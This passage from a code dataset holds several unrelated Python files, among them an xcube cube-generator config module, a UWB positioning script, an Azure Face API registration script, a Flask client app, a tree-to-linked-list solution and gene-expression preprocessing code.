'.png')\r\n\r\n\r\n","sub_path":"preprocessing/make_whole_label_image_for_segmentation2.py","file_name":"make_whole_label_image_for_segmentation2.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"190615142","text":"# The MIT License (MIT)\n# Copyright (c) 2020 by the xcube development team and contributors\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\n# of the Software, and to permit persons to whom the Software is furnished to do\n# so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport json\nimport os.path\nimport sys\nfrom typing import Optional, Dict, Any, Sequence, Mapping, Tuple\n\nimport jsonschema\nimport yaml\n\nfrom xcube.cli._gen2.error import GenError\nfrom xcube.util.assertions import assert_condition\nfrom xcube.util.assertions import assert_given\nfrom xcube.util.jsonschema import JsonArraySchema\nfrom xcube.util.jsonschema import JsonBooleanSchema\nfrom xcube.util.jsonschema import JsonDateSchema\nfrom xcube.util.jsonschema import JsonNumberSchema\nfrom xcube.util.jsonschema import JsonObjectSchema\nfrom xcube.util.jsonschema import JsonStringSchema\n\n\nclass InputConfig:\n    def __init__(self,\n                 store_id: str = None,\n                 opener_id: str = None,\n                 data_id: str = None,\n                 store_params: Mapping[str, Any] = None,\n                 open_params: Mapping[str, Any] = None):\n        assert_condition(store_id or opener_id, 'One of store_id and opener_id must be given')\n        assert_given(data_id, 'data_id')\n        self.store_id = store_id\n        self.opener_id = opener_id\n        self.data_id = data_id\n        self.store_params = store_params or {}\n        self.open_params = open_params or {}\n\n    @classmethod\n    def get_schema(cls) -> JsonObjectSchema:\n        return JsonObjectSchema(\n            properties=dict(\n                store_id=JsonStringSchema(min_length=1),\n                opener_id=JsonStringSchema(min_length=1),\n                data_id=JsonStringSchema(min_length=1),\n                store_params=JsonObjectSchema(additional_properties=True),\n                open_params=JsonObjectSchema(additional_properties=True)\n            ),\n            additional_properties=False,\n            required=['data_id'],\n            factory=cls,\n        )\n\n    def to_dict(self):\n        d = dict()\n        if self.store_id:\n            d.update(store_id=str(self.store_id))\n        if self.opener_id:\n            # serialise under its own key; the original wrote writer_id here by mistake\n            d.update(opener_id=str(self.opener_id))\n        if self.data_id:\n            d.update(data_id=str(self.data_id))\n        if self.store_params:\n            
d.update(store_params=dict(self.store_params))\n if self.open_params:\n d.update(open_params=dict(self.open_params))\n return d\n\n\nclass CallbackConfig:\n def __init__(self,\n api_uri: str = None,\n access_token: str = None):\n assert_condition(api_uri and access_token, 'Both, api_uri and access_token must be given')\n self.api_uri = api_uri\n self.access_token = access_token\n\n @classmethod\n def get_schema(cls):\n return JsonObjectSchema(\n properties=dict(\n api_uri=JsonStringSchema(min_length=1),\n access_token=JsonStringSchema(min_length=1)\n ),\n additional_properties=False,\n required=[\"api_uri\", \"access_token\"],\n factory=cls,\n )\n\n def to_dict(self) -> dict:\n d = dict()\n if self.api_uri:\n d.update(api_uri=self.api_uri)\n if self.access_token:\n d.update(access_token=self.access_token)\n\n return d\n\n\nclass OutputConfig:\n\n def __init__(self,\n store_id: str = None,\n writer_id: str = None,\n data_id: str = None,\n store_params: Mapping[str, Any] = None,\n write_params: Mapping[str, Any] = None,\n replace: bool = None):\n assert_condition(store_id or writer_id, 'One of store_id and writer_id must be given')\n self.store_id = store_id\n self.writer_id = writer_id\n self.data_id = data_id\n self.store_params = store_params or {}\n self.write_params = write_params or {}\n self.replace = replace\n\n @classmethod\n def get_schema(cls):\n return JsonObjectSchema(\n properties=dict(\n store_id=JsonStringSchema(min_length=1),\n writer_id=JsonStringSchema(min_length=1),\n data_id=JsonStringSchema(default=None),\n store_params=JsonObjectSchema(additional_properties=True),\n write_params=JsonObjectSchema(additional_properties=True),\n replace=JsonBooleanSchema(default=False),\n ),\n additional_properties=False,\n required=[],\n factory=cls,\n )\n\n def to_dict(self):\n d = dict()\n if self.store_id:\n d.update(store_id=str(self.store_id))\n if self.writer_id:\n d.update(writer_id=str(self.writer_id))\n if self.data_id:\n d.update(data_id=str(self.data_id))\n if self.store_params:\n d.update(store_params=dict(self.store_params))\n if self.write_params:\n d.update(write_params=dict(self.write_params))\n if self.replace:\n d.update(replace=True)\n return d\n\n\n# Need to be aligned with params in resample_cube(cube, **params)\nclass CubeConfig:\n\n def __init__(self,\n variable_names: Sequence[str] = None,\n crs: str = None,\n bbox: Tuple[float, float, float, float] = None,\n spatial_res: float = None,\n time_range: Tuple[str, Optional[str]] = None,\n time_period: str = None):\n assert_given(variable_names, 'variable_names')\n assert_given(bbox, 'bbox')\n assert_given(spatial_res, 'spatial_res')\n assert_given(time_range, 'time_range')\n self.variable_names = tuple(variable_names)\n self.crs = str(crs)\n self.bbox = tuple(bbox)\n self.spatial_res = float(spatial_res)\n self.time_range = tuple(time_range)\n self.time_period = str(time_period)\n\n def to_dict(self):\n d = dict(\n variable_names=list(self.variable_names),\n bbox=list(self.bbox),\n spatial_res=float(self.spatial_res),\n time_range=list(self.time_range)\n )\n if self.crs:\n d.update(crs=str(self.crs))\n if self.time_period:\n d.update(time_period=str(self.time_period))\n return d\n\n @classmethod\n def get_schema(cls):\n return JsonObjectSchema(\n properties=dict(\n variable_names=JsonArraySchema(\n items=JsonStringSchema(min_length=1),\n min_items=0\n ),\n crs=JsonStringSchema(\n nullable=True,\n min_length=1\n ),\n bbox=JsonArraySchema(\n nullable=True,\n items=[JsonNumberSchema(),\n JsonNumberSchema(),\n 
JsonNumberSchema(),\n JsonNumberSchema()]),\n spatial_res=JsonNumberSchema(\n nullable=True,\n exclusive_minimum=0.0),\n time_range=JsonDateSchema.new_range(\n nullable=True\n ),\n time_period=JsonStringSchema(\n nullable=True,\n pattern=r'^([1-9][0-9]*)?[DWMY]$'\n ),\n ),\n required=['variable_names'],\n additional_properties=False,\n factory=cls\n )\n\n\nclass GenConfig:\n def __init__(self,\n input_config: InputConfig = None,\n input_configs: Sequence[InputConfig] = None,\n cube_config: CubeConfig = None,\n output_config: OutputConfig = None,\n callback_config: Optional[CallbackConfig] = None):\n assert_condition(input_config or input_configs, 'one of input_config and input_configs must be given')\n assert_condition(not (input_config and input_configs), 'input_config and input_configs cannot be given both')\n if input_config:\n input_configs = [input_config]\n assert_given(input_configs, 'input_configs')\n assert_given(cube_config, 'cube_config')\n assert_given(output_config, 'output_config')\n self.input_configs = input_configs\n self.cube_config = cube_config\n self.output_config = output_config\n self.callback_config = callback_config\n\n @classmethod\n def get_schema(cls):\n return JsonObjectSchema(\n properties=dict(\n input_config=InputConfig.get_schema(),\n input_configs=JsonArraySchema(items=InputConfig.get_schema(), min_items=1),\n cube_config=CubeConfig.get_schema(),\n output_config=OutputConfig.get_schema(),\n callback_config=CallbackConfig.get_schema()\n ),\n required=['cube_config', 'output_config'],\n factory=cls,\n )\n\n def to_dict(self) -> Mapping[str, Any]:\n \"\"\"Convert into a JSON-serializable dictionary\"\"\"\n if len(self.input_configs) == 1:\n d = dict(input_config=self.input_configs[0].to_dict())\n else:\n d = dict(input_configs=[ic.to_dict() for ic in self.input_configs])\n\n d.update(cube_config=self.cube_config.to_dict(),\n output_config=self.output_config.to_dict())\n\n if self.callback_config:\n d.update(callback_config=self.callback_config.to_dict())\n\n return d\n\n @classmethod\n def from_dict(cls, request_dict: Dict) -> 'GenConfig':\n \"\"\"Create new instance from a JSON-serializable dictionary\"\"\"\n try:\n return cls.get_schema().from_instance(request_dict)\n except jsonschema.exceptions.ValidationError as e:\n raise GenError(f'{e}') from e\n\n @classmethod\n def from_file(cls, request_file: Optional[str], verbose=False) -> 'GenConfig':\n \"\"\"Create new instance from a JSON file, or YAML file, or JSON passed via stdin.\"\"\"\n gen_config_dict = cls._load_gen_config_file(request_file, verbose=verbose)\n if verbose:\n print(f'Cube generator configuration loaded from {request_file or \"TTY\"}.')\n return cls.from_dict(gen_config_dict)\n\n @classmethod\n def _load_gen_config_file(cls, gen_config_file: Optional[str], verbose=False) -> Dict:\n\n if gen_config_file is not None and not os.path.exists(gen_config_file):\n raise GenError(f'Cube generator configuration \"{gen_config_file}\" not found.')\n\n try:\n if gen_config_file is None:\n if not sys.stdin.isatty():\n if verbose:\n print('Awaiting generator configuration JSON from TTY...')\n return json.load(sys.stdin)\n else:\n with open(gen_config_file, 'r') as fp:\n if gen_config_file.endswith('.json'):\n return json.load(fp)\n else:\n return yaml.safe_load(fp)\n except BaseException as e:\n raise GenError(f'Error loading generator configuration \"{gen_config_file}\": {e}') from e\n\n raise GenError(f'Missing cube generator 
configuration.')\n","sub_path":"xcube/cli/_gen2/genconfig.py","file_name":"genconfig.py","file_ext":"py","file_size_in_byte":12188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"330012818","text":"# -*- coding:utf-8 -*-\n# carete by steve at 2018 / 05 / 13 下午2:37\n'''\n _ooOoo_ \n o8888888o \n 88\" . \"88 \n (| -_- |) \n O\\ = /O \n ____/`---'\\____ \n .' \\\\| |// `. \n / \\\\||| : |||// \\ \n / _||||| -:- |||||- \\ \n | | \\\\\\ - /// | | \n | \\_| ''\\---/'' | | \n \\ .-\\__ `-` ___/-. / \n ___`. .' /--.--\\ `. . __ \n .\"\" '< `.___\\_<|>_/___.' >'\"\". \n | | : `- \\`.;`\\ _ /`;.`/ - ` : | | \n \\ \\ `-. \\_ __\\ /__ _/ .-` / / \n======`-.____`-.___\\_____/___.-`____.-'====== \n `=---=' \n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ \n 佛祖保佑 永无BUG \n'''\n\nimport numpy as np\nimport scipy as sp\nfrom scipy import interpolate\nimport matplotlib.pyplot as plt\n\nfrom numba import jit\n\nimport matplotlib\nfrom mpl_toolkits.mplot3d import Axes3D\nimport time\n\nfrom PositioningAlgorithm.OptimizationAlgorithm.UwbOptimizeLocation import UwbOptimizeLocation\n\nfrom AlgorithmTool.ReferTraceEvaluateTools import *\n\nif __name__ == '__main__':\n matplotlib.use('Qt5Agg')\n # matplotlib.rcParams['toolbar'] = 'toolmanager'\n start_time = time.time()\n # dir_name = '/home/steve/Data/FusingLocationData/0017/'\n # dir_name = '/home/steve/Data/FusingLocationData/0013/'\n dir_name = '/home/steve/Data/NewFusingLocationData/0045/'\n\n # uwb_data = np.loadtxt(dir_name + 'uwb_result.csv', delimiter=',')\n # beacon_set = np.loadtxt(dir_name + 'beaconSet.csv', delimiter=',')\n uwb_data = np.loadtxt(dir_name + 'uwb_data.csv', delimiter=',')\n # beacon_set = np.loadtxt(dir_name + 'beaconset_no_mac.csv', delimiter=',')\n beacon_set = np.loadtxt(dir_name + 'beaconset_fill.csv', delimiter=',')\n\n uol = UwbOptimizeLocation(beacon_set)\n uwb_trace = np.zeros([uwb_data.shape[0], 3])\n uwb_opt_res = np.zeros([uwb_data.shape[0]])\n\n for i in range(uwb_data.shape[0]):\n if i is 0:\n uwb_trace[i, :], uwb_opt_res[i] = \\\n uol.iter_positioning((0, 0, 0),\n uwb_data[i, 1:])\n else:\n uwb_trace[i, :], uwb_opt_res[i] = \\\n uol.iter_positioning(uwb_trace[i - 1, :],\n uwb_data[i, 1:])\n\n\n @jit(nopython=True, cache=True)\n def compute_z_ave(uwb_trace, low_b=2.0, high_b=3.0):\n counter = 0\n the_sum = 0.0\n for i in range(uwb_trace.shape[0]):\n if low_b < uwb_trace[i, 2] < high_b:\n counter += 1\n the_sum += uwb_trace[i, 2]\n\n return float(the_sum) / float(counter)\n\n\n average_high = compute_z_ave(uwb_trace)\n print(average_high)\n\n # write acceptable data to file\n t_file = open(dir_name + 'selected_uwb_trace.csv', 'w')\n rc = Refscor(dir_name)\n\n t_trace = np.zeros_like(uwb_trace)\n for i in range(uwb_trace.shape[0]):\n if rc.eval_point2d(uwb_trace[i, :2]) < 0.5 and abs(uwb_trace[i, 2] - average_high) < 0.5:\n t_trace[i, :] = uwb_trace[i, :]\n t_file.write(\"%15.15f,%15.15f,%15.15f,%15.15f\\n\" % (\n uwb_data[i, 0], uwb_trace[i, 0], uwb_trace[i, 1], uwb_trace[i, 2]))\n\n t_file.close()\n\n plt.figure()\n plt.title('measuremment & res')\n for i in range(1, uwb_data.shape[1]):\n if uwb_data[:, i].max() > 0.0:\n plt.plot(uwb_data[:, 0], uwb_data[:, i], '+', label=str(i))\n plt.plot(uwb_data[:, 0], uwb_opt_res, '-*', label='res')\n plt.legend()\n plt.grid()\n\n # plt.figure()\n # plt.title('z value')\n # plt.hist(uwb_trace[:, 2], bins=100)\n # plt.grid()\n\n plt.figure()\n plt.title('uwb trace')\n plt.plot(uwb_trace[:, 0], uwb_trace[:, 1], label='source uwb')\n 
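The _load_gen_config_file logic above (JSON piped on stdin, otherwise JSON or YAML chosen by file extension) is a reusable pattern. A minimal standalone sketch, assuming only the standard json/sys modules and PyYAML:

import json
import sys

import yaml  # PyYAML, as imported by the snippet above

def load_config(path=None):
    # No path: expect JSON on stdin (mirrors the isatty() check above).
    if path is None:
        if sys.stdin.isatty():
            raise ValueError('no config file given and stdin is a TTY')
        return json.load(sys.stdin)
    # With a path: dispatch on the extension, defaulting to YAML,
    # which also parses plain JSON since YAML is a superset of it.
    with open(path, 'r') as fp:
        if path.endswith('.json'):
            return json.load(fp)
        return yaml.safe_load(fp)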
plt.plot(t_trace[:, 0], t_trace[:, 1], '*', label='t trace')\n plt.grid()\n plt.legend()\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.set_title(\"trace 3d\")\n ax.plot(uwb_trace[:, 0], uwb_trace[:, 1], uwb_trace[:, 2], '-+', label='source uwb')\n ax.plot(t_trace[:, 0], t_trace[:, 1], t_trace[:, 2], '*', label='t trace\\\\beta')\n ax.grid()\n ax.legend()\n\n # ref_trace = np.loadtxt(dir_name+'selected_uwb_trace.csv',delimiter=',')\n # smooth_fac = 0.5\n # xf = sp.interpolate.UnivariateSpline(ref_trace[:,0],ref_trace[:,1])\n # yf = sp.interpolate.UnivariateSpline(ref_trace[:,0],ref_trace[:,2])\n # xf.set_smoothing_factor(smooth_fac)\n # yf.set_smoothing_factor(smooth_fac)\n\n # plt.figure()\n # plt.title('ref and interpolate')\n # plt.plot(ref_trace[:,1],ref_trace[:,2],label='ref')\n # plt.plot(xf(uwb_data[:,0]),yf(uwb_data[:,0]),label='inter')\n # plt.grid()\n # plt.legend()\n\n plt.show()\n","sub_path":"PositioningAlgorithm/tester/ReliableUwbTraceWithRefTraceTest.py","file_name":"ReliableUwbTraceWithRefTraceTest.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"430391421","text":"###############################################\n## API New Person Training\n## (1) Add Person object (container)\n## (2) Attach new faces\n## (3) Retrain PersonGroup container\n## Created by: Jixin Jia (05-Jan-2018)\n##############################################\n\n'''\nAPI Interface\n(1) Face API PersonGroup -AddPerson\n -input: config.personGroupId\n -output: personId\n(2) Face API PersonGroup -Person -AddFace\n -input: config.personGroupId, personId\n -output: persistedFaceId\n(3) Face API PersonGroup -Train\n -input: config.personGroupId\n -output: N/A\n'''\n\nimport urllib.parse, json, requests, time , config, os\nfrom random import randint\n\ndef registerface(userName, userPhone):\n \n personId = None\n faceCount = 0\n statusMsg = None\n statusCode = 0\n randId = str(randint(1000,9999))\n\n if not userName:\n userName = 'Guest '+str(randId)\n \n if not userPhone:\n userPhone = 'Not provided'\n\n #### (1) Create Person ####\n headersAddPerson = {\n 'Content-Type': 'application/json',\n 'Ocp-Apim-Subscription-Key': config.APIKey,\n }\n bodyAddPerson = { 'name': userName, 'Userdata': userPhone }\n bodyAddPerson = json.dumps(bodyAddPerson)\n \n r = requests.post(config.urlAPI+\"/persongroups/\"+config.personGroupId+\"/persons\", headers=headersAddPerson, data=bodyAddPerson)\n res = r.json()\n \n if r.status_code == 200:\n personId = res['personId']\n \n #### (2) Add person & face(s) to PersonGroup ####\n headersAddFace = {\n 'Content-Type': 'application/octet-stream',\n 'Ocp-Apim-Subscription-Key': config.APIKey,\n }\n\n if len(os.listdir(config.filePath)) >0 :\n for filename in os.listdir(config.filePath):\n if filename.endswith(\".jpg\") or filename.endswith(\".png\"): \n imageFile = open(config.filePath+'/'+filename,'rb')\n bodyAddFace = imageFile.read()\n imageFile.close()\n\n r2 = requests.post(config.urlAPI+\"/persongroups/\"+config.personGroupId+\"/persons/\"+personId+\"/persistedFaces\", headers=headersAddFace, data=bodyAddFace)\n \n if r2.status_code == 200:\n faceCount += 1\n continue\n else:\n continue\n else:\n statusMsg = \"No faces detected !\" \n\n #### (3) Train the PersonGroup with newly added Person & Face ####\n if faceCount >0 :\n headersTrain = {\n 'Ocp-Apim-Subscription-Key': config.APIKey\n }\n \n r3 = 
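The compute_z_ave loop and the height-based acceptance test in the UWB script above can also be written with NumPy boolean masks instead of an explicit (numba-jitted) loop. A sketch with stand-in data, using the same 2.0/3.0 band and 0.5 tolerance:

import numpy as np

def z_average(trace, low_b=2.0, high_b=3.0):
    # Vectorised version of compute_z_ave above: mean z over the open
    # band (low_b, high_b); assumes at least one sample falls inside it.
    z = trace[:, 2]
    mask = (z > low_b) & (z < high_b)
    return float(z[mask].mean())

trace = np.array([[0.0, 0.0, 2.5],
                  [1.0, 0.0, 2.7],
                  [2.0, 0.0, 9.0]])   # stand-in positions
avg = z_average(trace)                 # 2.6
# Height-based acceptance, matching abs(z - average_high) < 0.5 above:
accepted = trace[np.abs(trace[:, 2] - avg) < 0.5]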
requests.post(config.urlAPI+\"/persongroups/\"+config.personGroupId+\"/train\", headers=headersTrain)\n\n            while True:\n                r4 = requests.get(config.urlAPI+\"/persongroups/\"+config.personGroupId+\"/training\", headers=headersTrain)\n                res4 = r4.json()\n\n                if r4.status_code == 200 and res4['status'] == 'succeeded':\n                    statusMsg = \"Successfully Registered \" + userName + \" !\"\n                    statusCode = 200\n                    break\n\n                elif r4.status_code == 200 and res4['status'] != 'succeeded':\n                    time.sleep(5)\n                    continue\n\n                else:\n                    statusMsg = \"Registration Failed. Try Again Later\"\n                    break\n        else:\n            statusMsg = \"No new faces available for registration\"\n    else:\n        statusMsg = \"Server Error ! Try Again\"\n\n    return statusCode, statusMsg\n","sub_path":"apitrain.py","file_name":"apitrain.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"479541891","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import redirect\n\nfrom client import get_client_list, get_client_by_id, add_client, update_client\nfrom forms import NewClientForm\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n    clients = get_client_list()\n    form = NewClientForm(request.form)\n    if request.method == 'POST' and form.validate():\n        data = {\n            'firstname': form.name.data,\n            'lastname': form.last_name.data,\n            'emailaddress1': form.email.data,\n            'telephone1': form.phone_number.data,\n        }\n        add_client(data)\n        return redirect('/')\n    return render_template('index.html', clients=clients, form=form)\n\n\n@app.route('/update_phone_number/<contactid>', methods=['GET'])\ndef update_phone_number(contactid):\n    client = get_client_by_id(contactid)\n    clean_phone_number = ''.join(c for c in client['telephone1'] if c.isdigit())\n    new_phone_number = int(clean_phone_number) + 1\n    update_client({'telephone1': new_phone_number}, client['contactid'])\n    return redirect('/')\n\n\nif __name__ == '__main__':\n    app.run()\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"196751206","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# animated_image.py\n#\n# Copyright 2012 Emil \n#\n\nfrom animated_image import AnimatedImage\nfrom random import randint\n\nclass AnimatedNumber(AnimatedImage):\n    def __init__(self, canvas, x, y, update_time, value, images, min=0, max=9):\n        AnimatedImage.__init__(self, canvas, x, y, update_time, images)\n        self.min = min\n        self.max = max\n        self.value = value\n        self.run_animation = False\n        self.image_value = value\n\n    def update(self, time):\n        if self.run_animation:\n            self.current_timer -= time\n            if self.current_timer < 0:\n                # Don't repeat the same value\n                new_value = randint(self.min, self.max)\n                while self.image_value == new_value:\n                    new_value = randint(self.min, self.max)\n\n                self.image_value = new_value\n\n                self.set_image(self.image_value)\n                self.current_timer = self.update_time\n\n    def set_image(self, value):\n        self.image = self.images[value]\n        self.canvas.itemconfig(self.canvas_image, image=self.image)\n\n    def set_value(self, value):\n        self.value = value\n        if not self.run_animation:\n            self.image_value = value\n            self.set_image(self.image_value)\n\n    def animate(self, bool):\n        self.run_animation = bool\n        if not bool:\n            self.image = self.images[self.value]\n            self.canvas.itemconfig(self.canvas_image, 
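The training-status loop in apitrain.py above polls forever if the service keeps answering a non-terminal status. A bounded variant of the same poll, assuming the same endpoint shape and headers (illustrative helper, not part of the original module):

import time
import requests

def wait_for_training(url, headers, poll_s=5, timeout_s=300):
    # Poll the persongroup training status until it succeeds, fails,
    # or the overall timeout elapses.
    deadline = time.time() + timeout_s
    while time.time() < deadline:
        r = requests.get(url, headers=headers)
        if r.status_code != 200:
            return False, 'Registration Failed. Try Again Later'
        status = r.json().get('status')
        if status == 'succeeded':
            return True, 'Training succeeded'
        if status == 'failed':
            return False, 'Training failed'
        time.sleep(poll_s)
    return False, 'Timed out waiting for training'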
image=self.image)\n","sub_path":"lotto/animated_number.py","file_name":"animated_number.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"435498616","text":"#!/usr/bin/python\nimport sys\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n this.val = val\n this.left, this.right = None, None\nDefinition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\"\"\"\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param {TreeNode} root the root of binary tree\n # @return {ListNode[]} a lists of linked list\n def binaryTreeToLists(self, root):\n # Write your code here\n if not root:\n return []\n result = []\n q = [root]\n while q:\n tmp = []\n tmp_l = ListNode(0)\n p = tmp_l\n for n in q:\n p.next = ListNode(n.val)\n p = p.next\n if n.left:\n tmp.append(n.left)\n if n.right:\n tmp.append(n.right)\n result.append(tmp_l.next)\n q = tmp\n return result\n\ndef main():\n aa = Solution()\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())","sub_path":"LintCode/convertBinaryTreeToLinkedListsByDepth.py","file_name":"convertBinaryTreeToLinkedListsByDepth.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"139524860","text":"import Console\n\nc = Console.getconsole()\nc.cursor(0)\n\nc.title(\"Console Example\")\n\nc.text(0, 0, \"here's some white text on white background\", 0x1f)\nc.text(10, 5, \"line five, column ten\")\n#c.getchar()\nc.pos(0, 6)\nc.cursor(1)\nwhile True:\n b = c.get()\n print(b.char)\n print(b.keycode)\n print(b.type)\n #print(b.keysym)\n print(\"\")\n","sub_path":"Python/Python scripts/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"499816537","text":"'''\n@auther: Samaneh\n'''\nimport pandas as pd\nimport numpy as np\nimport csv\n\n#################################################################################\n\ndef lohExtraction(cnv_df):\n for i in range(0,161927793):\n d = str(cnv_df[\"GENE_NAME\"][i])\n if \"_ENST\" in d:\n new = d.split(\"_ENST\")[0]\n cnv_df[\"GENE_NAME\"][i] = new \n\ndef handler():\n\n cnv_df = pd.read_csv(\"/home/jozashoori/External/Data/COSMIC/COSMIC_completeGeneExpression.csv\", low_memory=False)\n lohExtraction (cnv_df) \n cnv_df.to_csv(\"/home/jozashoori/External/Data/COSMIC/Preprocessed_MayJune/ThirdPreprocessed_gexp_lungCancer.csv\")\n\n\nif __name__ == \"__main__\":\n handler()","sub_path":"COSMIC_geneExpression_preprocessing.py","file_name":"COSMIC_geneExpression_preprocessing.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"165379343","text":"import urllib\nimport re\n\nfrom flask import g, request\n\n_slugify_strip_re = re.compile(r'[^\\w\\s-]')\n_slugify_hyphenate_re = re.compile(r'[-\\s]+')\n\nTITLES = {\n 'rep': 'Representative',\n 'sen': 'Senator',\n}\nPARTIES = {\n 'r': 'Republican',\n 'd': 'Democrat',\n 'i': 'Independent',\n}\nSTATES = {\n 'al': 'Alabama',\n 'ak': 'Alaska',\n 'az': 'Arizona',\n 'ar': 'Arkansas',\n 'ca': 'California',\n 'co': 'Colorado',\n 'ct': 'Connecticut',\n 'de': 
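The COSMIC preprocessing loop above mutates one row at a time through chained indexing, which is slow over ~160M rows and triggers pandas' SettingWithCopy warning; the same "_ENST" suffix strip can be done in one vectorised assignment. A sketch with stand-in data, assuming the same GENE_NAME column:

import pandas as pd

df = pd.DataFrame({'GENE_NAME': ['TP53_ENST00000269305', 'BRCA1', None]})
# str.split('_ENST').str[0] keeps everything before the first '_ENST',
# which is what the row loop above computes; astype(str) mirrors str(...).
df['GENE_NAME'] = df['GENE_NAME'].astype(str).str.split('_ENST').str[0]
print(df['GENE_NAME'].tolist())   # ['TP53', 'BRCA1', 'None']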
'Delaware',\n 'fl': 'Florida',\n 'ga': 'Georgia',\n 'hi': 'Hawaii',\n 'id': 'Idaho',\n 'il': 'Illinois',\n 'in': 'Indiana',\n 'ia': 'Iowa',\n 'ks': 'Kansas',\n 'ky': 'Kentucky',\n 'la': 'Louisiana',\n 'me': 'Maine',\n 'md': 'Maryland',\n 'ma': 'Massachussetts',\n 'mi': 'Michigan',\n 'mn': 'Minnesota',\n 'ms': 'Mississippi',\n 'mo': 'Missouri',\n 'mt': 'Montana',\n 'ne': 'Nebraska',\n 'nv': 'Nevada',\n 'nh': 'New Hampshire',\n 'nj': 'New Jersey',\n 'nm': 'New Mexico',\n 'ny': 'New York',\n 'nc': 'North Carolina',\n 'nd': 'North Dakota',\n 'oh': 'Ohio',\n 'ok': 'Oklahoma',\n 'or': 'Oregon',\n 'pa': 'Pennsylvania',\n 'ri': 'Rhode Island',\n 'sc': 'South Carolina',\n 'sd': 'South Dakota',\n 'tn': 'Tennessee',\n 'tx': 'Texas',\n 'ut': 'Utah',\n 'vt': 'Vermont',\n 'va': 'Virginia',\n 'wa': 'Washington',\n 'wv': 'West Virginia',\n 'wi': 'Wisconsin',\n 'wy': 'Wyoming',\n 'dc': 'District of Columbia',\n 'as': 'American Samoa',\n 'gu': 'Guam',\n 'mp': 'Northern Mariana Islands',\n 'pr': 'Puerto Rico',\n 'vi': 'U.S. Virgin Islands',\n 'fm': 'Federated States of Micronesia',\n 'mh': 'Marshall Islands',\n 'pw': 'Palau',\n}\nBILL_TYPES = {\n 'hr': 'House Bill',\n 'hres': 'House Resolution',\n 'hjres': 'House Joint Resolution',\n 'hcres': 'House Concurrent Resolution',\n 's': 'Senate Bill',\n 'sres': 'Senate Resolution',\n 'sjres': 'Senate Joint Resolution',\n 'scres': 'Senate Concurrent Resolution',\n}\n\n\ndef bill_type_for(abbr):\n abbr = re.split(r'([a-zA-Z.\\-]*)', abbr)[1].lower().replace('.', '')\n return BILL_TYPES.get(abbr)\n\n\ndef party_for(abbr):\n return PARTIES.get(abbr.lower(), abbr)\n\n\ndef rep_title_for(abbr):\n return TITLES.get(abbr.lower(), 'Representative')\n\n\ndef state_for(abbr):\n return STATES.get(abbr.lower())\n\n\ndef bill_number_for(abbr):\n try:\n return re.split(r'([a-zA-Z.\\-]*)', abbr)[2]\n except:\n return None\n\n\ndef digitless_querystring():\n querydict = request.values.to_dict()\n try:\n querydict = delattr(querydict, 'Digits')\n except AttributeError:\n pass\n\n return urllib.urlencode(querydict)\n\n\ndef digitless_url():\n return \"%s?%s\" % (request.path, digitless_querystring())\n\n\ndef log_redirect_url():\n write_context('redirect_to', \"%s?%s\" % (request.path, digitless_querystring()))\n\n\ndef reset_redirect_url():\n flush_context('redirect_to')\n\n\ndef read_context(key, default=None):\n try:\n return g.call['context'][key]\n except:\n return default\n\n\ndef write_context(key, value):\n try:\n g.call['context'][key] = value\n return True\n except:\n return False\n\n\ndef flush_context(key):\n try:\n del g.call['context'][key]\n return True\n except:\n return False\n\n\ndef get_lang(**kwargs):\n return read_context('language', kwargs.get('default', None))\n\n\ndef get_zip():\n return read_context('zipcode')\n\n\ndef slugify(value):\n \"\"\"\n Normalizes string, converts to lowercase, removes non-alpha characters,\n and converts spaces to hyphens.\n\n From Django's \"django/template/defaultfilters.py\".\n \"\"\"\n import unicodedata\n if not isinstance(value, unicode):\n value = unicode(value)\n value = 